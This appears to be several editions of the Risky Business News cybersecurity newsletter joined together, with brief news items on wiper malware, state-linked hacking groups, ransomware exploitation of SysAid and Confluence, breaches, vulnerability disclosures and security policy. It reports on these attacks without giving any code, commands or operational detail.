BiBi wiper: The BiBi wiper has been ported to Windows and is being used in a data destruction campaign targeting Israeli organizations. The malware was spotted at the end of October and was initially written for Linux systems. A pro-Hamas hacktivist group named Karma (or BiBiGun) has taken credit for creating and using the wiper, named after the nickname of Israel's prime minister, Benjamin Netanyahu. Researchers at Security Joes say the Karma group has a similar modus operandi as Iran-linked APT group Moses Staff.
Image: Security Joes
Sponsor Demo
Brought to you by Gigamon Precryption, a visibility solution for encrypted traffic across virtual machine (VM) or container workloads. Perform advanced threat detection, investigation, and response across the hybrid cloud infrastructure. To learn more, please visit gigamon.com/precryption
APTs, cyber-espionage, and info-ops
IMPERIAL KITTEN: Crowdstrike is seeing an upsurge in activity from an Iranian APT group named IMPERIAL KITTEN in the aftermath of the Israel-Hamas war. The company says new operations are targeting transportation, logistics, and technology firms in the Middle East with malware such as IMAPLoader and StandardKeyboard. Crowdstrike believes the group is connected to Iran's Islamic Revolutionary Guard Corps (IRGC). IMPERIAL KITTEN is also known under names such as TA456, Yellow Liderc, and Tortoiseshell.
ATPs in Poland: Five different APT groups have launched operations against Poland since Russia's invasion of Ukraine. Four of the five APTs are suspected to be Russian and include the likes of Turla, APT28, APT29, and UAC-0056. The fifth is Chinese group Mustang Panda, Poland's CSIRT team said in a report last week.
Rattlesnake: Chinese security firm Sangfor has published a report on recent operations conducted by Pakistani-based APT Rattlesnake.
Kamran: ESET has discovered a new malicious spyware strain named Kamran hidden inside an Android app distributed via a watering hole attack on Hunza News, a website targeting Urdu-speaking users living in Pakistan's Gilgit-Baltistan region. ESET believes the malware has compromised 20 devices so far. No attribution yet, but this looks like a state op.
Black Cube op in Hungary: Israeli private spy firm Black Cube has targeted Hungarian activists and journalists ahead of the country's presidential election in 2022. Discovered by LinkedIn's security team, which tracks the group as Blue Tsunami, the attacks involved a network of fake companies and employees to reach out to targets with bogus job offers. Speaking at the Cyberwarcon conference, LinkedIn says clips from private conversations between Black Cube operators and targets were used to discredit NGOs in the election run-up. LinkedIn says it removed both the fake profiles and Black Cube's official profile following what it described as a "high volume of abuse." [Additional coverage in Reuters/non-paywall]
National clean-up operation: South Korea's intelligence agency is working with local antivirus makers to remove vulnerable versions of the MagicLine4NX software across the country. Together with AhnLab, Hauri, and ESTsecurity, officials have developed a tool that updates MagicLine4NX to the latest release and removes the older vulnerable versions. The three antivirus makers are pushing the tool to all their customers in what has been described as South Korea's first-ever software clean-up effort. NIS officials warned in June that North Korean hackers were exploiting a vulnerability (CVE-2023-45797) in MagicLine4NX to hijack and infect systems with malware. The software is used for user authentication, including for accessing several government services.
Vulnerabilities, security research, and bug bounty
OpenVPN security updates: OpenVPN has published a security update to fix two memory-related security issues.
QNAP security updates: Taiwanese NAS vendor QNAP has released two security updates for its products.
Lenovo & MSI key leaks: Binarly has an analysis of the private key leaks that took place at Lenovo in September 2022 and MSI in April 2023. The report's main finding was that multiple companies were apparently using the same Intel Boot Guard private keys to sign different types of firmware images.
Foxit PDF reader one-click exploit: A threat actor has shared a one-click exploit for the Foxit PDF reader on an underground hacking forum. The Foxit is currently working on reproducing the exploit and preparing a patch, according to CyFirma security researcher Kaushík Pał, who found the post.
Image: Kaushík Pał
Infosec industry
Acquisition news: Security firm SentinelOne has acquired advisory firm Krebs Stamos Group and merged the company into a new entity named PinnacleOne. The new company will continue to provide the same business and geopolitical risk analysis the Krebs Stamos Group provided before. SentinelOne acquired the Krebs Stamos Group after the company laid off a third of all employees in May. [More in Alex Stamos' LinkedIn post]
"The entire KSG delivery team is coming over and we will continue to support our current clients with the same level of diligence and care while we hone and improve our services with the technical and analytical backing of SentinelLabs and the existing services teams."
New resources—Software Supply Chain Security: Security researcher Vishal Garg has published a GitHub repo with a collection of resources about supply chain security.
New tool—Pandora: Security researcher Efstratios Chatzoglou has released Pandora, a red-team tool for dumping and extracting credentials from browsers and password managers.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about the internet-melting 1988 Morris Worm and how cyber security has changed since then.
This newsletter is brought to you by asset inventory and network visibility company runZero. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
The infamous Clop ransomware gang is exploiting a zero-day vulnerability in on-prem SysAid IT automation servers.
The attacks were discovered last week by SysAid's security team, and the company released a software update to patch the exploited bug.
Tracked as CVE-2023-47246, SysAid's team described the zero-day as a "path traversal vulnerability leading to code execution."
The company says it worked with security firm Profero to investigate the attacks and found similar exploitation. Attacks involved exploiting the zero-day to gain control over the server, downloading and installing a Java webshell, and then running a series of PowerShell commands that installed the GraceWire trojan.
The attackers then used a second set of PowerShell scripts to remove traces of their intrusion and then moved to hands-on-keyboard activity on the compromised systems.
According to Microsoft's threat intel team, this involved the same Clop shenanigans of moving laterally across local networks, stealing any data they can get their hands on, and encrypting with its ransomware.
The recent attacks would make SysAid the fourth different enterprise software the gang has exploited this year after it previously targeted GoAnywhere and MOVEit file transfer servers and PaperCut print management servers.
All of these attacks are now part of Clop's regular mode of operation, which involves targeting popular enterprise software, stealing corporate data, encrypting systems, and then asking for ransoms for the decryption key or not publishing the victim's data.
The group has been doing this since late 2021 and rose to infamy after its successful mass exploitation of Accellion file transfer appliances.
On its website, SysAid says it has more than 5,000 customers, but IoT search engines like Shodan appear to see only 500 of these systems exposed on the internet.
Breaches, hacks, and security incidents
OCCRP journalists targeted with Pegasus: Two Indian reporters from the Organized Crime and Corruption Reporting Project have had their phones targeted with the Pegasus spyware. The attacks took place hours after the two reporters reached out for comment to the Adani Group, one of India's largest companies. The reporters were investigating the Adani Group's owners for possible market manipulation by secretly buying their own stocks. OCCRP reporters Ravi Nair and Anand Mangnale are two of the 20 Indians that Apple notified in October that their phones were targeted by state-sponsored malware.
ICBC ransomware attack: The Industrial and Commercial Bank of China has suffered a ransomware attack. The incident impacted the bank's ability to connect to US markets and settle trades for Chinese entities. ICBC is China's largest commercial lender by assets. [Additional coverage in the Financial Times/non-paywall]
Nordex BEC scam: Wind turbine giant Nordex lost $800,000 to a BEC scam after one of the company's employees paid a fake invoice to a scammer's account. The incident could have been worse since the invoice total was $1.75 million, which Nordex couldn't pay at the time. Nordex discovered the scam a month after making the initial payment. The FBI says that $50,000 of the stolen funds were sent to the bank account of Dr. Kelechi Ofoegbu, a Nigerian government official and regulator of the oil and gas industry. [Additional coverage in Forbes/non-paywall]
Sumo Logic breach: Cloud security company Sumo Logic has disclosed a security breach after a threat actor used a set of compromised credentials to gain access to its AWS servers. The company has rotated all its infrastructure and is now asking customers to reset and rotate their API keys. The keys are typically used to sync SIEM logs and backups from customer systems to Sumo Logic's servers.
OpenAI DDoS attacks: ChatGPT maker OpenAI says the recent technical outages appear to have been caused by a series of DDoS attacks that hit its servers.
CoinSpot crypto-heist: Cryptocurrency exchange CoinSpot has lost $2.4 million worth of crypto-assets after a threat actor used an unknown exploit to siphon the funds. The attack targeted two of the company's hot wallets. The Aussie company has yet to publicly confirm the hack.
MEV crypto-heist: A threat actor stole $2 million worth of cryptocurrency from an automated MEV (maximal extractable value) bot after its owner failed to set up the proper permissions.
General tech and privacy
Smart cars privacy lawsuit: A Washington state federal judge has ruled in favor of car manufacturers in a lawsuit that challenged their right to intercept and store a car owner's text and call logs. The judge ruled that carmakers didn't break state privacy laws when car infotainment systems secretly collected user data from drivers' phones when they were connected to the car. [Additional coverage in The Record]
NY data breach fine: The state of New York has fined healthcare provider US Radiology $450,000 for not securing its networking gear, which eventually led to the company getting ransomed and crooks stealing the data of 92,000 New Yorkers.
Omegle shuts down: Live video chat website Omegle has shut down 14 years after it first launched and after countless claims of child abuse. In a statement on its website, Omegle founder Leif Brooks said the site was no longer sustainable financially and psychologically. The site was known for matching random people in video chats and grew in popularity during the COVID-19 pandemic. It became widely known after it became a hunting ground for pedophiles, with more than 50 criminal cases citing Omegle in court documents. [Additional coverage in the BBC]
Zuckerberg ignored child safety: Court documents reveal that while executives called on Mark Zuckerberg to devote more staff to improve child safety on the company's apps, Meta's CEO ignored the requests for months while his company was doing the PR rounds about how safe the site was for kids. [Additional coverage in CNN]
2FA at DNA testing companies: DNA testing and genealogy companies Ancestry, MyHeritage, and 23andMe are enabling 2FA for all their customer accounts in an attempt to protect their users from brute-force attacks and account hijacking. [Additional coverage in TechCrunch]
ADA update: Google is relinquishing its control over the App Defense Alliance, and the organization will migrate under the Linux Foundation umbrella. As part of the move and restructuring, Microsoft and Meta are joining Google in the organization's founding steering committee to help ADA move forward with broader app security standards. Google founded the App Defense Alliance in 2019 with a focus on Google Play Store and Android app security. The organization expanded its scope in 2022 to cover cloud apps and security assessments.
GitHub Advanced Security: GitHub has announced the addition of AI-powered tools to its Advanced Security package.
WhatsApp Protect IP Address in Calls: Meta has announced two new security features for its WhatsApp instant messaging application. The first is named "Protect IP Address in Calls" and works by relaying all calls through WhatsApp servers in order to hide each participant's IP address from one another. The second is named "Silence Unknown Callers" and works by silencing calls from numbers that are not in a user's address book. Meta's engineering team says this second feature has a secondary side-effect of blocking zero-click exploits delivered via calling and network protocols. Meta did this by building a special protocol for delivering stripped-down, silenced call notifications and letting recipients choose to upgrade the alert to a fully-featured call.
Signal tests usernames: The Signal encrypted instant messaging service is testing support for usernames as a replacement for its current system, where real-world phone numbers serve as user identities. The new feature is currently available for the app's testers. Once finalized and released to the stable channel, users can select their usernames by going to the Settings/Profile and Settings/Privacy/Phone Number section. Signal devs did not say when they expect the new feature to launch.
Microsoft provides new election security tools: Microsoft is offering US politicians and campaign groups new tools to counter the rise of deepfakes and AI in the current election landscape. Named Content Credentials as a Service, the tool will help campaigns cryptographically watermark multimedia content. Microsoft says the tool will help campaigns spot when their content was modified using AI without authorization. In addition, Microsoft has also set up new teams to help candidates deal with cyber-influence campaigns.
Shields Ready: The DHS, CISA, and FEMA have launched a new project named Shields Ready, a campaign aimed at critical infrastructure operators and meant to get them to improve their cyber and physical security resilience.
Online Safety Act recommendations: UK telecommunications watchdog Ofcom has published draft guidance on how tech companies can comply with the UK's recently passed Online Safety Act, a new law aimed at making the internet safer for kids. The primary recommendations are below.
Children should not see lists of suggested friends;
Children should not appear in other users' lists of suggested friends;
Children should not be visible in other users' connection lists;
Children's connection lists should not be visible to other users;
Accounts outside a child's connection list should not be able to send them direct messages;
Children's location information should not be visible to any other users.
Russian media police: You can now get a "media police" bachelor's degree from Russian universities to police the internet and flag extremism, terrorist propaganda, piracy, and cyberbullying to Russian authorities. [Additional coverage in Izvestia]
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Huxley Barbee, Security Evangelist at runZero, about finding the unknown unknowns and what is a security evangelist.
Cybercrime and threat intel
Artemis Refund Group: The US government has arrested members of the Artemis Refund Group, a criminal gang that specializes in large-scale refund fraud. The group works with insiders at retailers and helps customers place large orders and then recover their money but keep the products. The group operates via Telegram, and their most common tactic revolves around filing Did-Not-Arrive complaints. [Additional coverage in 404 Media]
Monopoly Market admin pleads guilty: A Serbian national has pleaded guilty in a US court to running Monopoly Market, a dark web drug market. Milomir Desnica, 33, was arrested in Austria in November 2022 and extradited to the US earlier this year. The Monopoly Market was taken down by German authorities in December 2021. Intelligence collected during the takedown was used to detain 288 drug traders in May this year, part of Operation SpecTor. Europol called it its most successful operation against dark web marketplaces so far.
Qakbot takedown aftermath: A KELA report found that the law enforcement takedown of the Qakbot botnet has had a minimal impact on the cybercrime underground, with many former Qakbot members and customers continuing to collaborate on operations.
Hunters International: Bitdefender has an analysis of recent attacks carried out by an extortion group named Hunters International, a rebrand of the Hive ransomware group.
Nokoyawa RaaS shuts down: The Nokoyawa ransomware operation has shut down in October 2023 after a decision by its creator, a threat actor named Farnetwork. Prior to Nokoyawa, the same individual helped create and run other ransomware strains, such as JSWORM, Nemty, Nefilim, and Karma. Security firm Group-IB believes Farnetwork will most likely launch another RaaS platform under a new name.
New ransomware trends: The FBI says that since 2022, ransomware gangs have breached third-party gaming vendors as a way to gain access and encrypt the networks of US casinos. The attacks have targeted small and tribal casinos and are separate from the MGM and Caesars hacks that took place this August. The FBI says it is also seeing ransomware gangs use callback-phishing and remote access tools to gain access to corporate employee systems. One of the groups that has used this technique is the Silent Ransom Group, also known as Luna Moth. [Additional information in the FBI's PIN]
Ransomware campaigns: AhnLab is seeing phishing campaigns distribute the Phobos and LockBit ransomware.
WindowsReport/CPU-Z malvertising campaign: Malwarebytes has spotted a malvertising campaign activating on Google Search. The campaign used a clone of the WindowsReport tech news site to lure users to a malicious installer for the popular processor tool CPU-Z.
Google Forms abuse: Cisco Talos has discovered spam groups abusing the "Release scores" of Google Forms quizzes to deliver malicious mail to victims. Because the emails originate from Google servers, the campaigns bypass email security solutions. Talos says it saw abuse of this feature as far back as 2021, but volumes spiked this year.
SLP protocol enters abuse:CISA says threat actors are exploiting a vulnerability in the Service Location Protocol (SLP) to launch DDoS attacks in the wild. News of active exploitation comes six months after security firms said the protocol could be abused for the largest DDoS attacks known to date. Companies like Bitsight and Curesec said SLP had a DDoS amplification factor of 2,200, the third largest factor known to date. DDoS attacks abusing SLP come two weeks after a researcher posted a proof-of-concept tool on GitHub. The vulnerability that enables these attacks is tracked as CVE-2023-29552.
Sordeal releases free version: Per CyFirma security researcher Kaushík Pał, Nova Sentinel, the author of the Sordeal infostealer, has released a free version of their malware.
Malware technical reports
BlazeStealer: Checkmarx has discovered a malicious campaign on PyPI distributing a new malware strain, BlazeStealer. Controlled via a Discord bot, the malware can be used to steal credentials from infected hosts, take screenshots via the webcam, and even deploy additional malware.
GhostLocker: Rapid7 looks at GhostLocker, a RaaS created by the GhostSec "hacktivist" group.
Sponsor Demo
Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray. runZero is a cyber asset management tool that combines active scanning, passive discovery, and API integrations to discover IT, OT, and IoT assets (both managed and unmanaged) across your network, including cloud, mobile, and remote environments.
APTs, cyber-espionage, and info-ops
NSA's SecondDate: Chinese security researchers have published a technical analysis of SecondDate, a malware strain first detailed in the Snowden leaks (2013). In September, the Chinese MSS claimed the NSA used the malware as recently as June 2022 to hack the network of the Xi'an Northwestern Polytechnical University.
Black Cube campaign: Microsoft's security team says that Israeli private intelligence agency Black Cube (tracked as Blue Tsunami) is conducting LinkedIn phishing campaigns. The company honeypot profiles, fake jobs, and fake companies to engage in reconnaissance or human intelligence (HUMINT) operations on behalf of its customers.
Caracal Kitten: Chinese security researchers have a breakdown of a new mobile RAT used by the Caracal Kitten APT.
MuddyWater's MuddyC2Go: Deep Instinct researchers have analyzed MuddyC2Go, a new command and control (C2) framework used by Iranian cyber-espionage group MuddyWater. The framework is written in Go and has been used in attacks since 2020.
No Iran-Hamas cyber cooperation so far:Microsoft says it has not seen any signs of cyber cooperation between Iran and Hamas hackers, either prior to or after the start of the recent Hamas-Israeli conflict last month.
Sapphire Sleet:Microsoft says it is seeing the Sapphire Sleep APT setting up new infrastructure for its LinkedIn social engineering campaigns. The group, also known as BlueNoroff, has a history of targeting individuals working in the cryptocurrency space.
Asian APTs: Kaspersky has a top-down look at the recent tactics employed by "modern" Asian APTs in their intrusions across the globe. The report is 370 pages long and mainly covers attacks from Chinese APTs, such as Stone Panda, Emissary Panda, Mustang Panda, APT41, and others.
Chinese APT in Cambodia: Chinese state-sponsored hackers have breached at least 24 Cambodian government agencies in one of the largest compromises of the year. The intrusions were spotted by security firm Palo Alto Networks, who detected traffic going from the compromised agencies to the infrastructure of a Chinese APT group. The infrastructure had been disguised to look like cloud backup services. According to Palo Alto, hackers seem to have gained access to government agencies responsible for national defense, elections, finances, telecommunications, and natural resources.
Kremlin "influence-for-hire" firms: The US State Department says the Kremlin is using three "influence-for-hire" companies to spread its propaganda across Latin America. Officials say companies such as the Social Design Agency, the Institute for Internet Development, and Structura have helped plant pro-Russian stories with local news outlets and social media influencers. The State Department says the articles are written in Russia, translated to Spanish or Portuguese, and then sent to the three companies for promotion across local news outlets. Officials have named Ilya Gambashidze as the lead in Russia's disinformation effort in Latin America.
New Sandworm power grid attack: Russian military hackers breached the network of a Ukrainian power grid operator in June 2022 and launched a cyber-attack that crashed its OT environment to trigger a power outage in October 2022. This marks the third time since 2014 that Russian hacking group Sandworm has triggered a power outage in Ukraine using solely cyber tools. Mandiant says the cyber-attack coincided with missile strikes on critical infrastructure across Ukraine. The security firm told Wired reporter Andy Greenberg that they don't have evidence to support the theory that Russia intended the blackout and bombings to be simultaneous, but Mandiant pointed out that Sandworm held on to access to the hacked power grid for weeks prior to deploying their attack just before the kinetic missile strikes.
Vulnerabilities, security research, and bug bounty
Defiant bug bounty program: Security firm Defiant, the maker of the Wordfence firewall plugin for WordPress sites, has launched a private bounty program. The program will work like ZDI and will pay researchers to find vulnerabilities and disclose them privately to its program. Defiant will then handle disclosing and getting a fix pushed out for the bugs.
Azure Automation Service: Security firm SafeBreach has developed several ways to abuse the Azure Automation Service and execute code without getting charged—a useful feature for crypto-mining gangs. The company released a tool named CloudMiner that exploits these loopholes, some of which have been patched by Microsoft.
NTLM leak: Check Point researchers have identified a vulnerability in Microsoft Access databases that can be used to bypass firewalls and leak a Windows user's NTLM password hash. The technique abuses a Microsoft Access feature named Linked Table that allows Access databases to link to each other's tables. Check Point says the feature is exempt from local firewall rules, allowing attackers to piggyback on it and send NTLM hashes out of a network.
Netgear vulnerability: QuarksLab has published a write-up on CVE-2023-27368, a vulnerability in the soap_serverd daemon of Netgear routers. The company used the vulnerability in the 2022 edition of the Pwn2Own Toronto hacking contest.
PRTG RCE: Bladur Security has found an RCE (CVE-2023-32782) in the PRTG Network Monitor utility, often used in data centers and corporate networks.
Visual Studio Code vulnerabilities: SonarSource researchers have published part one of its three-part series on vulnerabilities they found in Microsoft's Visual Studio Code app. The team's DEFCON talk is below.
Infosec industry
Virus Bulletin 2023 videos: Talks from the Virus Bulletin 2023 security conference, which took place last month, are available on YouTube.
No Hat 2023 videos: Talks from the No Hat 2023 security conference, which took place last month, are available on YouTube.
New tool—ConscryptTrustUserCerts: NCC Group has open-sourced a tool named ConscryptTrustUserCerts that can be used for intercepting (some) HTTPS traffic on Android 14.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about the internet-melting 1988 Morris Worm and how cyber security has changed since then.
This newsletter is brought to you by asset inventory and network visibility company runZero. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Chinese state-sponsored hacking operations have undergone a major shift in recent years, with groups growing in sophistication and abandoning noisy and high-volume campaigns for stealthy and extremely targeted attacks.
If you read APT reports for a living—like this newsletter's author—then nothing in the above sentence is new to you.
Over the past two or three years, there have been numerous reports across the infosec industry about how Chinese APT group "XX" or how Chinese APT group "YY" has changed their modus operandi.
Unless you're constantly reading these reports, it is hard to see the big picture, spot general trends, and notice the slow evolution of Chinese APTs from the OpSec failures of the late 2000s to apex predators in today's global cyber landscape.
Seeing the big picture can be challenging when you're reading text on the back of small puzzle pieces, but the folks at Recorded Future published an excellent report this week that perfectly contextualizes what has been happening with China's APTs in the 2020s.
There are several main conclusions that we will list below, although we recommend you read the report for yourself since it's the most complete picture we've seen assembled on Chinese APT activity in recent years. These are not copy-pasted and include some of our own commentary and additions.
Chinese state-sponsored operations are slowly moving away from high-volume targeting. Gone are the days of spear-phishing operations targeting every diplomat under the sun and major corporations with "attractive" intellectual property. Today, Chinese APT groups are more coordinated and thoughtful when selecting targets. Recorded Future puts this on the Chinese government's restructuring of its intelligence and military apparatus in the mid-2010s.
Chinese groups are moving away from custom malware and infrastructure to using open-source tools and public exploits.
Chinese groups are using networks of compromised routers and IoT equipment as proxy/anonymization tools to hide malicious traffic and infrastructure.
Chinese groups have also been among the first APT groups to adopt LOLbins for operations, replacing highly detectable malware with the abuse of locally installed apps. See this CISA advisory here for more.
Even if past attribution has linked some Chinese APT groups to private contractors, military units, or intelligence service bureaus, many groups are now sharing tools, suggesting the existence of some sort of private exploit/tooling supply chain across the entire Chinese cyber apparatus. This is giving security companies (see SentinelOne example here) fits when it comes to attribution. This was never a problem in the past, primarily because APT clusters were often easily delineated, the malware code and infrastructure contained many OpSec mistakes, and because of each group's unique TTPs.
Since 2021, Chinese APTs have shifted towards the exploitation of public-facing appliances. Targets included appliances such as firewalls, enterprise VPNs, hypervisors, load balancers, and email security products. These are devices found in almost all government and corporate networks and are often used as initial access and pivot points to more "desirable" sections of a target's network.
This shift towards targeting public-facing appliances has stood out like a sure thumb. In fact, Recorded Future says that 85% of all the zero-days abused by Chinese APTs since 2021 have been in public-facing appliances, showing how crucial (the targeting of) these devices has become to Chinese cyber operations.
Chinese APT groups have also been among the first to exploit publicly-known vulnerabilities in these types of products, for the same reason, to get perches inside highly sought-after targets before anyone else.
Just like Microsoft in its Digital Defense Report last year and the Atlantic Council in a report this year, Recorded Future puts China's increased usage of zero-days on the country's new vulnerability disclosure law that allows the country's intelligence security agency to learn of new vulnerabilities before patches are out.
China has heavily invested in increasing the sheer size of its cyber forces, which means the country is now capable of both qualitative and quantitative operations.
Finally, the report also includes an attribution map for China's APT groups, including their suspected geographical locations. This is in line with what Sekoia published earlier this year, too.
Breaches, hacks, and security incidents
Monero Project hack: A threat actor has emptied the community wallet of the Monero Project and stole $450,000 worth of community donations. The hack took place on September 1st but was only discovered four weeks later, on the 28th. The Monero team says it has not found how the hacker stole the funds.
Bitfinex breach: Cryptocurrency exchange Bitfinex says a threat actor successfully phished and gained access to the account of one of its customer support agents. The company says the hacker gained access to a small amount of customer information because the support agent had limited permissions. Bitfinex says most of the affected customer accounts were either empty or inactive.
Frax Finance DNS hijack: DeFi platform Frax Finance suffered a DNS hijacking attack last week that saw its engineers lose control over its two main domains frax[.]finance and frax[.]com.
Shimano ransomware attack: Bike component manufacturer Shimano suffered a ransomware attack, and more than 4.5TB of data was stolen in the incident. The attack has been claimed by the LockBit ransomware group. [Additional coverage in CyclingNews]
Zhefengle leak: Chinese e-commerce platform Zhefengle has leaked information on more than 3.3 million orders placed on its site between 2015 and 2020. The data included the personal details of millions of Chinese citizens, such as names, phone numbers, and home addresses. For some orders, buyers also had to provide copies of their identity cards, which also leaked in the incident. According to CloudDefense's Viktor Markopoulos, the data leaked after the Chinese company left one of its databases exposed on the internet without a password. [Additional coverage in TechCrunch]
Fake LinkedIn breach: Troy Hunt, the founder of the Have I Been Pwned service, has disproven claims made this week by a hacker named USDoD that they breached social media company LinkedIn. It's fake people. Calm down!
"To lead with the conclusion and save you reading all the details if you're not inclined, the dataset so many people flagged me this week titled 'Linkedin Database 2023 2.5 Millions' turned out to be a combination of publicly available LinkedIn profile data and 5.8M email addresses mostly fabricated from a combination of first and last name."
General tech and privacy
Mandatory MFA for Microsoft admin portals: Microsoft is enabling mandatory multi-factor authentication for customers logging into any of its cloud admin portals. The change will impact Azure, Microsoft 365, and Exchange admin centers. Microsoft joins the ranks of AWS and Oracle as cloud services that require mandatory MFA to access admin accounts.
Discord switches to temp file URLs: Instant messaging service Discord will start hosting file uploads on temporary URLs by the end of the year. The company says all temporary URLs will expire after 24 hours, with files also being deleted from its servers. Discord says it is making the switch in an attempt to prevent threat actors from using its platform for hosting malware or parts of cybercrime infrastructure. [Additional coverage in BleepingComputer]
Twitter disinformation: Several social media research groups have abandoned studies of disinformation on Twitter after the company raised API access prices through the roof and after Elon Musk started suing researchers who published studies claiming the site was helping push state-backed propaganda (like we needed a study to see the obvious in Twitter's Trending section), per a Reuters report.
Government, politics, and policy
Anti-DPRK cooperation: Officials from Japan, South Korea, and the US launched a cooperation group to counter North Korea's cyber operations, which have been used to finance its weapons program. [Additional coverage in Reuters]
FISA reform legislation: US lawmakers have introduced a new bill to reauthorize US surveillance powers under Section 702 of the Foreign Intelligence Surveillance Act, set to expire at the end of the year. Named the Government Surveillance Reform Act, the bill adds protections for US citizens. The primary change will require US law enforcement agencies to obtain a court warrant before searching the data of US citizens against the FISA data set. The Section 702 reform comes after ODNI found multiple cases of FISA misuse over the past years. The bill also goes beyond FISA and prohibits US government agencies from purchasing Americans' data from data brokers, a tactic used in the past for warrantless surveillance. The bill has been introduced on both floors of the US Congress and has bipartisan support. [Additional coverage in JustSecurity and Cyberscoop]
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Huxley Barbee, Security Evangelist at runZero, about finding the unknown unknowns and what is a security evangelist.
Cybercrime and threat intel
Indian crypto-scam group detained: Indian authorities have detained eight suspects who stole $300 million (₹2,500 crore) from a cryptocurrency investment fund. The scheme lured victims to invest saved rupees into a cryptocurrency project. More than 5,000 government employees from the Himachal Pradesh state lost funds when the scheme collapsed, and some of its administrators fled to Dubai. Four of the 18 detained suspects work for the Himachal Pradesh police force. [Additional coverage in The Times of India]
Anonymous Sudan: Netscout takes a look at the DDoS makeup and capabilities of Anonymous Sudan pro-Kremlin "hAcKtIvIsT" group. Just a reminder that the group is a Russian operation.
"Initially, all posts to Telegram were in Russian, which called into question the veracity of the group's selection of name and purported origin. As other researchers have noted Anonymous Sudan eventually started using Arabic in posts and eventually switched to Sudanese dialects. Many of the initial posts in Russian have since been deleted or removed. The group often overlooks actions taken against Sudan or Islam in non-Western countries."
Malware technical reports
D0nut ransomware: NCC Group has published a report reviewing the tactics used by the D0nut ransomware and extortion group.
Mallox ransomware: Chinese security firm Tinder has published a report on a threat actor using brute-force attacks to breach MSSQL databases and deploy the Mallox ransomware.
Jupyter Infostealer: VMWare's Carbon Black analyzes new versions of the Jupyter infostealer, a malware strain first spotted in 2020 and also known as Yellow Cockatoo, Solarmarker, and Polazert.
GootBot: IBM's X-Force team has discovered a new component of the GootLoader malware that is currently being deployed on corporate networks to facilitate easier lateral movement. The new component is named GootBot, and X-Force says the component is used instead of the Cobal Strike framework.
SecuriDropper: Researchers at mobile security firm ThreatFabric have discovered a new malware operation named SecuriDropper that can bypass the "Restricted Settings" security feature in Android 13. The Restricted Settings feature works by blocking side-loaded apps from accessing sensitive permissions. The SecuriDropper malware infects Android smartphones via malicious side-loaded apps, bypasses the Restricted Settings limitation, and then downloads additional malware payloads. SecuriDropper is available as a Dropper-as-a-Service, and its creator makes money by renting access to other criminal groups to drop any payload they want on the infected devices. SecuriDropper is the second known malware strain that can bypass Android 13's Restricted Settings feature after Zombinder.
Sponsor Demo
Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray. runZero is a cyber asset management tool that combines active scanning, passive discovery, and API integrations to discover IT, OT, and IoT assets (both managed and unmanaged) across your network, including cloud, mobile, and remote environments.
APTs and cyber-espionage
Agonizing Serpens: An Iranian hacking group named Agonizing Serpens has conducted multiple destructive attacks against Israeli organizations in the education and technology sectors. The group has been active since 2020 and is known for breaching networks to collect intelligence and then deploying ransomware or wipers to hide its tracks and disrupt the victim's operations. According to Palo Alto Networks, the group's recent hacking campaign lasted from January to October this year and involved three data wipers named MultiLayer, PartialWasher, and BFG Agonizer. Also known as Agrius, Pink Sandstorm, and BlackShadow, Microsoft has linked [PDF] the group to Iran's Ministry of Intelligence and Security.
AridViper: SentinelOne has a report on AridViper, the APT group allegedly run by Hamas members. The report focuses on the group's operations targeting Android smartphones, also covered in this Talos report.
"Through 2022 and 2023, the actor has distributed SpyC23, an Android spyware family, through weaponized apps posing as Telegram or as a dating app called Skipped."
SideCopy: SEQRITE delves into recent SideCopy APT operations that have leveraged a recent WinRAR zero-day (CVE-2023-38831) to deploy versions of the DRat and AllaKore RATs. It also covers attacks against Linux systems with the Ares RAT.
Evilnum/DarkCasino: NSFOCUS looks at how the Evilnum/DarkCasino fin group has incorporated the same WinRAR zero-day (CVE-2023-38831) in its attacks.
BlueNoroff: Jamf has published a report on a recent campaign of the BlueNoroff DPRK APT that targeted macOS users with a new malware strain written in Objective-C and named ObjCShellz.
Vulnerabilities, security research, and bug bounty
QNAP security updates: Taiwanese NAS vendor QNAP has released four security updates for its products.
Veeam security updates: Cloud backup provider Veeam has released security updates to patch four vulnerabilities.
Bitrix24: Researchers at STAR Labs have found and helped patch seven vulnerabilities in the Bitrix24 CRM platform.
BatSignal: Security researcher Gergely Kalman has published a technical write-up on BatSignal (CVE-2022-26704), an unprivileged user to root elevation of privilege vulnerability in macOS.
Printer vulnerabilities: Devcore has published part two of a write-up on three printer vulnerabilities it used at the Pwn2Own hacking contest back in 2021. The vulnerabilities are pre-auth RCEs and impact Canon, HP, and Lexmark printers.
Zephyr Project vulnerabilities: Security researcher Marco Ivaldi has found 12 vulnerabilities in the Zephyr real-time OS.
Atlassian exploitation: A threat actor is exploiting a recently patched vulnerability (CVE-2023-22518) in Atlassian Confluence systems to bypass authentication and encrypt servers with the C3rb3r ransomware. This version of the C3rb3r ransomware is based on the leaked Conti ransomware code and is not related to the old and more infamous Cerber ransomware from the mid-2010s. The attacks began over the weekend and were spotted by security firms Red Canary, Huntress, and Rapid7. The group is one of the many threat actors that are currently targeting Confluence systems after mass exploitation began at the end of last week. Following reports of active attacks, Atlassian also updated the bug's severity score from a 9.1 to a 10/10.
VEX guide: CISA has published a document on how companies can issue a VEX (Vulnerability Exploitability eXchange) alert when bugs in their software are being actively exploited in the wild.
Infosec industry
Ekoparty 2023 videos: Talks from the Ekoparty 2023 security conference, which took place last week, are available on YouTube. All the talks are in Spanish.
Hexacon 2023 videos: Talks from the Hexacon 2023 security conference, which took place earlier this month, are available on YouTube.
Dutch Police podcast: The Dutch Police's cybercrime unit is launching a podcast discussing some of its biggest operations. The first episode covers the Rubella malware takedown, and the podcast will have six episodes. Obviously, the podcast is in Dutch.
Acquisition news: Palo Alto Networks has announced plans to buy browser security startup Talon Security for $625 million. The deal comes after Palo Alto also bought cloud security firm Dig Security last week for $400 million.
New tool—PatchaPalooza: Cybersecurity researcher Alexander Hagenah has released PatchaPalooza, a tool that provides an analysis of Microsoft Patch Tuesday updates. Also available as a standalone interactive website.
